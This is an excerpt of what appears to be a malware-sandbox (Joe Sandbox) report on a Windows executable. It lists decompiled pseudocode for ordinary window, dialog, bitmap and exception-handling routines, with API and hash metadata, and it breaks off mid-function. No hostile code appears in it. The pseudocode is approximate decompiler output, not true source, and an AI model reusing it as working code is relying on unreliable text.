                    • Part of subcall function 00427D9F: __CallSettingFrame@12.LIBCMT ref: 00427DEB
                    • Part of subcall function 0042CB7C: __getptd.LIBCMT ref: 0042CB8B
                    • Part of subcall function 0042CB7C: __getptd.LIBCMT ref: 0042CB99
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                  • String ID:
                  • API String ID: 1602911419-0
                  Uniqueness

                  Uniqueness Score: 0.09%

                  C-Code - Quality: 38%
                  			E00420AB2(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                  				struct tagRECT _v20;
                  				struct HWND__* _t12;
                  				struct HWND__* _t21;
                  
                  				ClientToScreen(_a4,  &_a8);
                  				_push(5);
                  				_push(_a4);
                  				while(1) {
                  					_t12 = GetWindow();
                  					_t21 = _t12;
                  					if(_t21 == 0) {
                  						break;
                  					}
                  					if(GetDlgCtrlID(_t21) != 0xffff && (GetWindowLongW(_t21, 0xfffffff0) & 0x10000000) != 0) {
                  						GetWindowRect(_t21,  &_v20);
                  						_push(_a12);
                  						if(PtInRect( &_v20, _a8) != 0) {
                  							return _t21;
                  						}
                  					}
                  					_push(2);
                  					_push(_t21);
                  				}
                  				return _t12;
                  			}







                  APIs
                  • ClientToScreen.USER32(?,?), ref: 00420AC3
                  • GetDlgCtrlID.USER32(00000000), ref: 00420AD7
                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00420AE7
                  • GetWindowRect.USER32(00000000,?), ref: 00420AF9
                  • PtInRect.USER32(?,?,?), ref: 00420B09
                  • GetWindow.USER32(?,00000005), ref: 00420B16
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Rect$ClientCtrlLongScreen
                  • String ID:
                  • API String ID: 1315500227-0
                  • Opcode ID: 3c6d4f7b08a955105ea467ebb56ca48002f540298c4fdc68c7896c3943357c5f
                  • Instruction ID: 3c119bf798499c757b55538c10e404d99049b784118abeabbd0072bf16216c48
                  • Opcode Fuzzy Hash: 3c6d4f7b08a955105ea467ebb56ca48002f540298c4fdc68c7896c3943357c5f
                  • Instruction Fuzzy Hash: 9601A232240129BBCB319F94EC0CEAF7BACEF51724F404021F951D21A1E778E925CB99
                  Uniqueness

                  Uniqueness Score: 0.18%

                  C-Code - Quality: 63%
                  			E0041C362(intOrPtr __ecx, void* __edx, intOrPtr _a4, RECT* _a8) {
                  				signed int _v8;
                  				char _v528;
                  				RECT* _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				char _v552;
                  				intOrPtr _v556;
                  				signed int _v560;
                  				struct tagRECT _v576;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t71;
                  				signed char _t79;
                  				signed int _t84;
                  				signed int _t89;
                  				signed int _t91;
                  				signed int _t99;
                  				signed int _t114;
                  				intOrPtr _t128;
                  				void* _t129;
                  				intOrPtr _t136;
                  				void* _t151;
                  				signed int _t153;
                  				void* _t154;
                  				intOrPtr _t157;
                  				void* _t158;
                  				signed int _t163;
                  
                  				_t151 = __edx;
                  				_t130 = __ecx;
                  				_t161 = _t163;
                  				_t71 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t71 ^ _t163;
                  				_t157 = _a4;
                  				_t128 = __ecx;
                  				_t153 = 0;
                  				_v536 = _t157;
                  				_v532 = _a8;
                  				if(__ecx == 0) {
                  					L2:
                  					E00413DD0(_t130);
                  				}
                  				if(_t157 == _t153) {
                  					goto L2;
                  				}
                  				_t7 = _t157 + 0x20; // 0x69614d43
                  				_t76 = GetWindowRect( *_t7,  &_v576);
                  				if( *((intOrPtr*)(_t157 + 0x90)) != _t128 || _v532 != _t153 && EqualRect( &_v576, _v532) == 0) {
                  					if( *((intOrPtr*)(_t128 + 0x98)) != _t153 && ( *(_t157 + 0x88) & 0x00000040) != 0) {
                  						 *(_t128 + 0x84) =  *(_t128 + 0x84) | 0x00000040;
                  					}
                  					 *(_t128 + 0x84) =  *(_t128 + 0x84) & 0xfffffff9;
                  					_t20 = _t157 + 0x84; // 0x0
                  					_t79 =  *_t20 & 0x00000006 |  *(_t128 + 0x84);
                  					 *(_t128 + 0x84) = _t79;
                  					_t175 = _t79 & 0x00000040;
                  					if((_t79 & 0x00000040) == 0) {
                  						_push(0x104);
                  						_push( &_v528);
                  						E00411F38(_t128, _t157, _t153, _t157, _t175);
                  						E004208C1(_t157, _t151,  *((intOrPtr*)(_t128 + 0x20)),  &_v528);
                  					}
                  					_t28 = _t157 + 0x84; // 0x0
                  					_t30 = _t157 + 0x84; // 0x0
                  					_t84 = ( *_t28 ^  *(_t128 + 0x84)) & 0x0000f000 ^  *_t30 | 0x00000f00;
                  					if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
                  						_t85 = _t84 & 0xfffffffe;
                  						__eflags = _t84 & 0xfffffffe;
                  					} else {
                  						_t85 = _t84 | 0x00000001;
                  					}
                  					E00422C07(_t157, _t85);
                  					_v556 = _t153;
                  					if( *((intOrPtr*)(_t157 + 0x90)) != _t128) {
                  						_t34 = _t157 + 0x20; // 0x69614d43
                  						if(IsWindowVisible( *_t34) != 0) {
                  							E00411EB6(_t157, _t153, _t153, _t153, _t153, _t153, 0x97);
                  							_v556 = 1;
                  						}
                  					}
                  					_v560 = _v560 | 0xffffffff;
                  					if(_v532 == _t153) {
                  						E0041B59E(_t128 + 0x9c, _t157);
                  						E0041B59E(_t128 + 0x9c, _t153);
                  						_t89 =  *0x44fc24; // 0x2
                  						_t91 =  *0x44fc20; // 0x2
                  						_t135 = _t157;
                  						E00411EB6(_t157, _t153,  ~_t91,  ~_t89, _t153, _t153, 0x115);
                  					} else {
                  						E00406B80( &_v552, _v532);
                  						E004144FC(_t128,  &_v552);
                  						asm("cdq");
                  						asm("cdq");
                  						_push((_v540 - _v548 - _t151 >> 1) + _v548);
                  						_push((_v544 - _v552 - _t151 >> 1) + _v552);
                  						_push(_v536);
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						asm("movsd");
                  						_t114 = E0041B858(_t128);
                  						_t135 = _v536;
                  						_v560 = _t114;
                  						E00411EB6(_v536, 0, _v552, _v548, _v544 - _v552, _v540 - _v548, 0x114);
                  						_t157 = _v536;
                  						_t153 = 0;
                  					}
                  					_t61 = _t157 + 0x20; // 0x69614d43
                  					if(E0040E20E(_t128, _t135, GetParent( *_t61)) != _t128) {
                  						E0041B5D2(_t157, _t128);
                  					}
                  					_t62 = _t157 + 0x90; // 0x65726854
                  					_t136 =  *_t62;
                  					if(_t136 != _t128) {
                  						__eflags = _t136 - _t153;
                  						if(_t136 != _t153) {
                  							__eflags =  *((intOrPtr*)(_t128 + 0x98)) - _t153;
                  							if( *((intOrPtr*)(_t128 + 0x98)) == _t153) {
                  								L29:
                  								_t99 = 0;
                  								__eflags = 0;
                  							} else {
                  								__eflags =  *((intOrPtr*)(_t136 + 0x98)) - _t153;
                  								if( *((intOrPtr*)(_t136 + 0x98)) != _t153) {
                  									goto L29;
                  								} else {
                  									_t99 = 1;
                  								}
                  							}
                  							_push(_t99);
                  							_push(0xffffffff);
                  							goto L31;
                  						}
                  					} else {
                  						_push(_t153);
                  						_push(_v560);
                  						L31:
                  						_push(_t157);
                  						E0041BC28(_t136, _t153);
                  					}
                  					 *((intOrPtr*)(_t157 + 0x90)) = _t128;
                  					if(_v556 != _t153) {
                  						E00411EB6(_t157, _t153, _t153, _t153, _t153, _t153, 0x57);
                  					}
                  					E0041BBBF(_t128, _t128, _t157);
                  					 *(E004159C1(_t128) + 0xe4) =  *(_t76 + 0xe4) | 0x0000000c;
                  				}
                  				_pop(_t154);
                  				_pop(_t158);
                  				_pop(_t129);
                  				return E00427DFF(_t76, _t129, _v8 ^ _t161, _t151, _t154, _t158);
                  			}

                  APIs
                  • GetWindowRect.USER32(69614D43,?), ref: 0041C3A7
                  • EqualRect.USER32(?,?), ref: 0041C3CE
                  • IsWindowVisible.USER32(69614D43), ref: 0041C47D
                    • Part of subcall function 00413DD0: __CxxThrowException@8.LIBCMT ref: 00413DE6
                    • Part of subcall function 0041B858: GetWindowRect.USER32(?,?), ref: 0041B8C4
                    • Part of subcall function 00411EB6: SetWindowPos.USER32(69614D43,00000000,0044B1B0,00000000,00000115,00000000,00000000), ref: 00411EDE
                  • GetParent.USER32(69614D43), ref: 0041C5A4
                    • Part of subcall function 0041B5D2: SetParent.USER32(69614D43,00000000), ref: 0041B5E5
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Rect$Parent$EqualException@8ThrowVisible
                  • String ID: @
                  • API String ID: 3297862425-2766056989
                  • Opcode ID: cf983c9ae98adb0141863d2ac5171b0deb360f95187c45a19b12fc5579b0d53f
                  • Instruction ID: 38db4fd9eb10d967e2e3fd90bfb5e0ed549e930bf926492dff71c7ea3bc83b05
                  • Opcode Fuzzy Hash: cf983c9ae98adb0141863d2ac5171b0deb360f95187c45a19b12fc5579b0d53f
                  • Instruction Fuzzy Hash: C071B471A40519ABCB20EF69CC89BEEB7B5BF48304F1045AEE51EE6151DB349E808F58
                  Uniqueness

                  Uniqueness Score: 10.55%

                  C-Code - Quality: 100%
                  			E00425F01(void** __ecx, WCHAR* _a4, short _a8) {
                  				signed int _v8;
                  				signed int* _v12;
                  				intOrPtr _v16;
                  				signed int _v20;
                  				intOrPtr _v24;
                  				void* __ebx;
                  				signed int _t56;
                  				void* _t57;
                  				intOrPtr _t58;
                  				short* _t59;
                  				signed int _t61;
                  				signed int* _t73;
                  				short* _t75;
                  				void* _t82;
                  				signed int* _t89;
                  				signed int _t90;
                  				void* _t91;
                  				void** _t92;
                  				intOrPtr _t94;
                  				signed int _t97;
                  				void* _t99;
                  
                  				_t92 = __ecx;
                  				if(__ecx[1] != 0) {
                  					_t73 = GlobalLock( *__ecx);
                  					_v12 = _t73;
                  					_v8 = 0 | _t73[0] == 0x0000ffff;
                  					_v20 = E00425D35(_t73);
                  					_t94 = (0 | _v8 != 0x00000000) + (0 | _v8 != 0x00000000) + 1 + (0 | _v8 != 0x00000000) + (0 | _v8 != 0x00000000) + 1;
                  					_v24 = _t94;
                  					if(_v8 == 0) {
                  						 *_t73 =  *_t73 | 0x00000040;
                  					} else {
                  						_t73[3] = _t73[3] | 0x00000040;
                  					}
                  					_t56 = lstrlenW(_a4);
                  					if(_t56 >= 0x20) {
                  						L15:
                  						_t57 = 0;
                  						goto L18;
                  					} else {
                  						_t58 = _t94 + 2 + _t56 * 2;
                  						_v16 = _t58;
                  						if(_t58 < _t94) {
                  							goto L15;
                  						}
                  						_t59 = E00425D7C(_t73);
                  						_t82 = 0;
                  						_t75 = _t59;
                  						if(_v20 != 0) {
                  							_t82 = _t94 + 2 + E00429211(_t75 + _t94) * 2;
                  						}
                  						_t29 = _v16 + 3; // 0x3
                  						_t89 = _v12;
                  						_t32 = _t75 + 3; // 0x3
                  						_t61 = _t82 + _t32 & 0xfffffffc;
                  						_t97 = _t75 + _t29 & 0xfffffffc;
                  						_v20 = _t61;
                  						if(_v8 == 0) {
                  							_t90 =  *(_t89 + 8) & 0x0000ffff;
                  						} else {
                  							_t90 =  *(_t89 + 0x10) & 0x0000ffff;
                  						}
                  						if(_v16 == _t82 || _t90 <= 0) {
                  							L17:
                  							 *_t75 = _a8;
                  							E0040B6B0(_t75 + _v24, _t75 + _v24, _v16 - _v24, _a4, _v16 - _v24);
                  							_t92[1] = _t92[1] + _t97 - _v20;
                  							GlobalUnlock( *_t92);
                  							_t92[2] = _t92[2] & 0x00000000;
                  							_t57 = 1;
                  							L18:
                  							return _t57;
                  						} else {
                  							_t91 = _t92[1];
                  							_t86 = _t91 - _t61 + _v12;
                  							if(_t91 - _t61 + _v12 <= _t91) {
                  								E0040B6B0(_t75, _t97, _t86, _t61, _t86);
                  								_t99 = _t99 + 0x10;
                  								goto L17;
                  							}
                  							goto L15;
                  						}
                  					}
                  				}
                  				return 0;
                  			}

                  APIs
                  • GlobalLock.KERNEL32(?,762C5DDF,System,0000000A,004260B9,System,?,?,00000000), ref: 00425F1D
                  • lstrlenW.KERNEL32(?), ref: 00425F68
                  • _wcslen.LIBCMT ref: 00425F92
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: GlobalLock_wcslenlstrlen
                  • String ID: System
                  • API String ID: 2647411976-3470857405
                  • Opcode ID: 2441d7b0fb694e26714863b5f49c84b091091f0473a09fec826e39981e6f6696
                  • Instruction ID: 8c8cc497bbc57e996c04b924fb8f2349e3915eaee87331b7d34588128dc58608
                  • Opcode Fuzzy Hash: 2441d7b0fb694e26714863b5f49c84b091091f0473a09fec826e39981e6f6696
                  • Instruction Fuzzy Hash: 1F411371A00525EFCB14DFA4E985A6FB7B4FF04304F51856BE812E7281D7389E51CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 81%
                  			E00411B43(void* __edx) {
                  				signed int _v8;
                  				void _v136;
                  				int _v140;
                  				int _v144;
                  				char _v148;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				signed int _t21;
                  				unsigned int _t23;
                  				char* _t35;
                  				struct HBITMAP__* _t37;
                  				unsigned int _t40;
                  				signed short _t42;
                  				void* _t46;
                  				int _t47;
                  				unsigned int _t49;
                  				void* _t52;
                  				signed char* _t53;
                  				signed int _t58;
                  				void* _t59;
                  				signed int _t62;
                  				void* _t63;
                  				void* _t64;
                  				signed int _t66;
                  				signed int _t68;
                  
                  				_t52 = __edx;
                  				_t66 = _t68;
                  				_t21 =  *0x44c364; // 0xa6e2bca1
                  				_v8 = _t21 ^ _t66;
                  				_t23 = GetMenuCheckMarkDimensions();
                  				_t47 = _t23;
                  				_t40 = _t23 >> 0x10;
                  				_v144 = _t47;
                  				_v140 = _t40;
                  				if(_t47 <= 4 || _t40 <= 5) {
                  					E00413DD0(_t47);
                  				}
                  				if(_t47 > 0x20) {
                  					_t47 = 0x20;
                  					_v144 = _t47;
                  				}
                  				asm("cdq");
                  				_t62 = _t47 + 0xf >> 4;
                  				_t58 = (_t47 - 4 - _t52 >> 1) + (_t62 << 4) - _t47;
                  				if(_t58 > 0xc) {
                  					_t58 = 0xc;
                  				}
                  				if(_t40 > 0x20) {
                  					_t40 = 0x20;
                  					_v140 = _t40;
                  				}
                  				E004281D0(_t58,  &_v136, 0xff, 0x80);
                  				_t35 = _t66 + (_t40 - 6 >> 1) * _t62 * 2 - 0x84;
                  				_t53 = 0x43df90;
                  				_t63 = _t62 + _t62;
                  				_v148 = 5;
                  				do {
                  					_t42 = ( *_t53 & 0x000000ff) << _t58;
                  					_t53 =  &(_t53[1]);
                  					_t49 =  !_t42 & 0x0000ffff;
                  					 *_t35 = _t49 >> 8;
                  					 *(_t35 + 1) = _t49;
                  					_t35 = _t35 + _t63;
                  					_t15 =  &_v148;
                  					 *_t15 = _v148 - 1;
                  				} while ( *_t15 != 0);
                  				_t37 = CreateBitmap(_v144, _v140, 1, 1,  &_v136);
                  				_pop(_t59);
                  				_pop(_t64);
                  				 *0x44fc60 = _t37;
                  				_pop(_t46);
                  				if(_t37 == 0) {
                  					 *0x44fc60 = _t37;
                  				}
                  				return E00427DFF(_t37, _t46, _v8 ^ _t66, _t53, _t59, _t64);
                  			}

                  APIs
                  • GetMenuCheckMarkDimensions.USER32 ref: 00411B5B
                  • _memset.LIBCMT ref: 00411BD3
                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00411C36
                  • LoadBitmapW.USER32(00000000,00007FE3), ref: 00411C4E
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                  • String ID:
                  • API String ID: 4271682439-3916222277
                  • Opcode ID: 75a9ac3af90586ce2079edc930b762fa0c963262a639b2f794e791e24d5379fc
                  • Instruction ID: f5ea2f4e17038bf8802b084befe88b8a2bf3895c297ac26d65a48744e6abe9cb
                  • Opcode Fuzzy Hash: 75a9ac3af90586ce2079edc930b762fa0c963262a639b2f794e791e24d5379fc
                  • Instruction Fuzzy Hash: 48312971A042199BEB208F289CC5BE977B5FB44704F4440BBEA49D7291EA349D888B54
                  Uniqueness

                  Uniqueness Score: 1.55%

                  C-Code - Quality: 96%
                  			E004189BE(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                  				intOrPtr _t39;
                  				intOrPtr _t47;
                  				void* _t63;
                  				intOrPtr _t65;
                  				void* _t68;
                  				void* _t69;
                  
                  				_t63 = __edx;
                  				_t53 = __ebx;
                  				_push(0x48);
                  				E00429294(E00439078, __ebx, __edi, __esi);
                  				_t65 =  *((intOrPtr*)(_t69 + 8));
                  				_t68 = __ecx;
                  				E00404820(_t69 - 0x54);
                  				 *(_t69 - 4) =  *(_t69 - 4) & 0x00000000;
                  				if((E00411D59(_t68) & 0x00004000) == 0) {
                  					_t32 =  *((intOrPtr*)(_t68 + 0xc4));
                  					_t57 = _t69 - 0x54;
                  					E00405AF0(__ebx, _t69 - 0x54, _t65, _t68,  *((intOrPtr*)(_t68 + 0xc4)),  *((intOrPtr*)(_t32 - 0xc)));
                  					if(_t65 != 0) {
                  						E00405700(_t69 - 0x54, " - ");
                  						_t57 = _t69 - 0x54;
                  						E00405700(_t69 - 0x54, _t65);
                  						_t39 =  *((intOrPtr*)(_t68 + 0x58));
                  						if(_t39 > 0) {
                  							swprintf(_t69 - 0x50, 0x20, ":%d", _t39);
                  							_t57 = _t69 - 0x54;
                  							E00405700(_t69 - 0x54, _t69 - 0x50);
                  						}
                  					}
                  					L9:
                  					_t66 =  *((intOrPtr*)(_t69 - 0x54));
                  					E004208C1(_t57, _t63,  *((intOrPtr*)(_t68 + 0x20)),  *((intOrPtr*)(_t69 - 0x54)));
                  					E004055F0(_t66 - 0x10);
                  					return E00429317(_t53, _t66, _t68);
                  				}
                  				if(_t65 == 0) {
                  					L5:
                  					_t44 =  *((intOrPtr*)(_t68 + 0xc4));
                  					_t57 = _t69 - 0x54;
                  					E00405AF0(_t53, _t69 - 0x54, _t65, _t68,  *((intOrPtr*)(_t68 + 0xc4)),  *((intOrPtr*)(_t44 - 0xc)));
                  					goto L9;
                  				}
                  				E00405700(_t69 - 0x54, _t65);
                  				_t47 =  *((intOrPtr*)(_t68 + 0x58));
                  				if(_t47 > 0) {
                  					swprintf(_t69 - 0x50, 0x20, ":%d", _t47);
                  					E00405700(_t69 - 0x54, _t69 - 0x50);
                  				}
                  				E00405700(_t69 - 0x54, " - ");
                  				goto L5;
                  			}

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 004189C5
                    • Part of subcall function 00411D59: GetWindowLongW.USER32(?,000000F0), ref: 00411D64
                  • swprintf.LIBCMT ref: 00418A09
                    • Part of subcall function 00427E5F: __vswprintf_s_l.LIBCMT ref: 00427E73
                  • swprintf.LIBCMT ref: 00418A7D
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: swprintf$H_prolog3_LongWindow__vswprintf_s_l
                  • String ID: - $:%d
                  • API String ID: 1519946483-2359489159
                  • Opcode ID: ecb4198cebc564249fc146c4e95e9c1e24f6b17cedfcefe8256bf9ecf0dfb3bc
                  • Instruction ID: 065f3513f436dfd16c769c952297cce57e11ed919ebbbc1ead23b62b6d15edda
                  • Opcode Fuzzy Hash: ecb4198cebc564249fc146c4e95e9c1e24f6b17cedfcefe8256bf9ecf0dfb3bc
                  • Instruction Fuzzy Hash: CC215175900604EBDB10E7D1D996FEFB378EF14704F90442FB502AB196EA7CAE089B58
                  Uniqueness

                  Uniqueness Score: 3.75%

                  C-Code - Quality: 100%
                  			E0041E66D(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
                  				void* __edi;
                  				struct HWND__* _t10;
                  				struct HWND__* _t12;
                  				struct HWND__* _t14;
                  				struct HWND__* _t15;
                  				int _t19;
                  				void* _t21;
                  				void* _t25;
                  				struct HWND__** _t26;
                  				void* _t27;
                  
                  				_t25 = __edx;
                  				_t21 = __ebx;
                  				_t26 = _a4;
                  				_t27 = __ecx;
                  				if(E0040C1EC(__ecx, __eflags, _t26) == 0) {
                  					_t10 = E0040ED5B(__ecx);
                  					__eflags = _t10;
                  					if(_t10 == 0) {
                  						L5:
                  						__eflags = _t26[1] - 0x100;
                  						if(_t26[1] != 0x100) {
                  							L13:
                  							return E0040C7DE(_t26);
                  						}
                  						_t12 = _t26[2];
                  						__eflags = _t12 - 0x1b;
                  						if(_t12 == 0x1b) {
                  							L8:
                  							__eflags = GetWindowLongW( *_t26, 0xfffffff0) & 0x00000004;
                  							if(__eflags == 0) {
                  								goto L13;
                  							}
                  							_t14 = E00420A6C(_t21, _t25, _t26, __eflags,  *_t26, L"Edit");
                  							__eflags = _t14;
                  							if(_t14 == 0) {
                  								goto L13;
                  							}
                  							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
                  							__eflags = _t15;
                  							if(_t15 == 0) {
                  								L12:
                  								SendMessageW( *(_t27 + 0x20), 0x111, 2, 0);
                  								goto L1;
                  							}
                  							_t19 = IsWindowEnabled(_t15);
                  							__eflags = _t19;
                  							if(_t19 == 0) {
                  								goto L13;
                  							}
                  							goto L12;
                  						}
                  						__eflags = _t12 - 3;
                  						if(_t12 != 3) {
                  							goto L13;
                  						}
                  						goto L8;
                  					}
                  					__eflags =  *(_t10 + 0x68);
                  					if( *(_t10 + 0x68) == 0) {
                  						goto L5;
                  					}
                  					return 0;
                  				}
                  				L1:
                  				return 1;
                  			}














                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID:
                  • String ID: Edit
                  • API String ID: 0-554135844
                  • Opcode ID: c1eaeca9360dd2e0f6646002c445170fec6f5d61c69e99854a4b31f63b5ac5b7
                  • Instruction ID: b5ab8b2baa659c6befb1724199395fd29165e35119e0420f22d42a720b62807e
                  • Opcode Fuzzy Hash: c1eaeca9360dd2e0f6646002c445170fec6f5d61c69e99854a4b31f63b5ac5b7
                  • Instruction Fuzzy Hash: F1118239340212ABEA2026279C09B9BB669AF61754FD00537FD41E61E1CFACD8E1C55D
                  Uniqueness

                  Uniqueness Score: 6.84%

                  C-Code - Quality: 28%
                  			E0042CE03(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                  				void* __ebp;
                  				void* _t20;
                  				void* _t22;
                  				void* _t23;
                  				void* _t25;
                  				intOrPtr* _t26;
                  				void* _t27;
                  				void* _t28;
                  
                  				_t27 = __esi;
                  				_t26 = __edi;
                  				_t25 = __edx;
                  				_t23 = __ecx;
                  				_t22 = __ebx;
                  				_t30 = _a20;
                  				if(_a20 != 0) {
                  					_push(_a20);
                  					_push(__ebx);
                  					_push(__esi);
                  					_push(_a4);
                  					E0042CD71(__ebx, __edi, __esi, _t30);
                  					_t28 = _t28 + 0x10;
                  				}
                  				_t31 = _a28;
                  				_push(_a4);
                  				if(_a28 != 0) {
                  					_push(_a28);
                  				} else {
                  					_push(_t27);
                  				}
                  				E00427A52(_t23);
                  				_push( *_t26);
                  				_push(_a16);
                  				_push(_a12);
                  				_push(_t27);
                  				E0042C7EE(_t22, _t25, _t26, _t27, _t31);
                  				_push(0x100);
                  				_push(_a24);
                  				_push(_a16);
                  				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                  				_push(_a8);
                  				_push(_t27);
                  				_push(_a4);
                  				_t20 = E0042CA56(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
                  				if(_t20 != 0) {
                  					E00427A19(_t20, _t27);
                  					return _t20;
                  				}
                  				return _t20;
                  			}












                  APIs
                  • ___BuildCatchObject.LIBCMT ref: 0042CE16
                    • Part of subcall function 0042CD71: ___BuildCatchObjectHelper.LIBCMT ref: 0042CDA7
                  • _UnwindNestedFrames.LIBCMT ref: 0042CE2D
                  • ___FrameUnwindToState.LIBCMT ref: 0042CE3B
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                  • String ID: csm$l}D
                  • API String ID: 2163707966-671395483
                  • Opcode ID: 11c63b8505b0a9d1028eb40c4b72c4472e59987acd9840c730c7ee8513159caa
                  • Instruction ID: 97ba0c25cf88d2267801a78c478078dec4f43481847f31abb851874b044a3a44
                  • Opcode Fuzzy Hash: 11c63b8505b0a9d1028eb40c4b72c4472e59987acd9840c730c7ee8513159caa
                  • Instruction Fuzzy Hash: 64014B71100129BBDF12AF51EC85EAF7F6AFF08394F81401ABD0815121D73A9971EBA9
                  Uniqueness

                  Uniqueness Score: 100.00%

                  C-Code - Quality: 68%
                  			E004140C2(void* __ecx, intOrPtr _a4) {
                  				struct HINSTANCE__* _t4;
                  				_Unknown_base(*)()* _t5;
                  				void* _t9;
                  				void* _t10;
                  
                  				_t10 = __ecx;
                  				_t4 = GetModuleHandleA("GDI32.DLL");
                  				_t9 = 0;
                  				_t5 = GetProcAddress(_t4, "SetLayout");
                  				if(_t5 == 0) {
